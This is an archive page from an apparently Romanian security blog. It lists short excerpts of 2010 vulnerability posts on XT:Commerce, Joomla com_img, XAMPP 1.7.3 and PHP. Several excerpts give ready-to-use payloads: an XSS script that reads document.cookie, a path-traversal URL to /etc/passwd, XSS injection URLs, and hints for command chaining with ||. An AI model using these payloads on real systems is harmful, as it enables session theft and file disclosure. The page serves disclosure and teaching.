Arhiva | Securitatea aplicatiilor web RSS pentru aceasta categorie
XT:Commerce 3.04 SP2.1 – Vulnerabilitate XSS - Securitatea Informatica

XT:Commerce 3.04 SP2.1 – Vulnerabilitate XSS

Data: 11 noiembrie 2010 Descriere: XT: Comert este predispus la atacuri XSS. Un atacator trebuie să creeze un cont, sa injecteze javascript in campul “street” (ex.: “><script type=”text/javascript”>alert (document.cookie) </script>) şi sa plaseze o comandă. În cazul în care administratorul deschide comanda în backend-ul magazinului, codul javascript va fi executat. Prin obtinerea cookie al admin, [...]

Citeşte mai mult
Vulnerabilitati PHP – Authentication Bypass - Securitatea Informatica

Vulnerabilitati PHP – Authentication Bypass

Sfaturi : Uitaţi-vă cu atenţie în scripturi, în foldere administrative, poate nu sunt protejate, şi căutaţi variabile nedefinite ca “login” sau “auth”. Exemplu de bază Vă voi prezenta un exemplu simplu. Veţi vedea cum să treceţi de login prin metoda “variabilei de login”. Cod: <?php if ($logged==true) { echo ’Logged in.’; } else { print ’Not logged in.’; } ?> Aici [...]

Citeşte mai mult
Despre Cross Site Scripting (XSS) - Securitatea Informatica

Despre Cross Site Scripting (XSS)

1. Cuvânt înainte Acest articol este dedicat unei vulnerabilităţi web numită Cross Site Scripting. Exemplele întâlnite pe parcursul articolului sunt create în Cascading Style Sheet (CSS), HyperText Markup Language (HTML), Hypertext Preprocessor (PHP), JavaScript (JS) şi Visual Basic Script (VBScript). 2. Definiţie Cross Site Scripting (prescurtat XSS) este o vulnerabilitate web ce permite utilizatorului să [...]

Citeşte mai mult
Joomla com_img – Local File Inclusion - Securitatea Informatica

Joomla com_img – Local File Inclusion

Data: 10 noiembrie 2010 Descriere: Vulnerabilitate LFI (includere de fisier local) in componenta Joomla com_img. Exploit: http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00

Citeşte mai mult
Vulnerabilitati PHP – Remote Command Execution - Securitatea Informatica

Vulnerabilitati PHP – Remote Command Execution

Sfaturi : Dacă un script foloseşte exec() nu vom putea vedea rezultatul comenzii (dar comanda este executată) până când rezultatul nu este printat din script. Putem folosii operatorul OR ( || ) dacă scriptul execută mai mult de o comandă. În PHP există câteva comenzi prin intermediul cărora putem executa comenzi: exec — Execută un [...]

Citeşte mai mult
Xampp 1.7.3 – vulnerabilitati multiple - Securitatea Informatica

Xampp 1.7.3 – vulnerabilitati multiple

Data: 6 noiembrie 2010 Descriere: XAMPP este o distribuţie Apache care conţin MySQL, PHP şi Perl. Vulnerabilitati: http://localhost/xampp/ming.php/”<script>alert(“XSS”)</script> http://localhost/xampp/iart.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/cds.php/’onmouseover=alert(“XSS”)> http://localhost/xampp/aspinfo.asp/1<script>alert(“XSS”)</script> http://localhost/xampp/adodb.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/perlinfo.pl/1<script>prompt(“XSS”)</script> Aparare: Producatorul ar trebui să filtreze caracterele speciale din formulare. Clienţii ar trebui să stabilească parola de acces la XAMPP folder.

Citeşte mai mult
Pagina 3 din 512345
This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro